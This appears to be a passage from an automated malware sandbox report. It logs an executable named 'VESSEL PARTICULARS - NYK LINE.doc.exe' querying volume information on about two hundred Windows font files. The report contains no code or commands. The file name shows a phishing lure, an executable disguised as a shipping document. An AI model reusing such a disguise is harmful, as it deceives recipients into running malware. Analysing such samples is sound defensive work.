                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
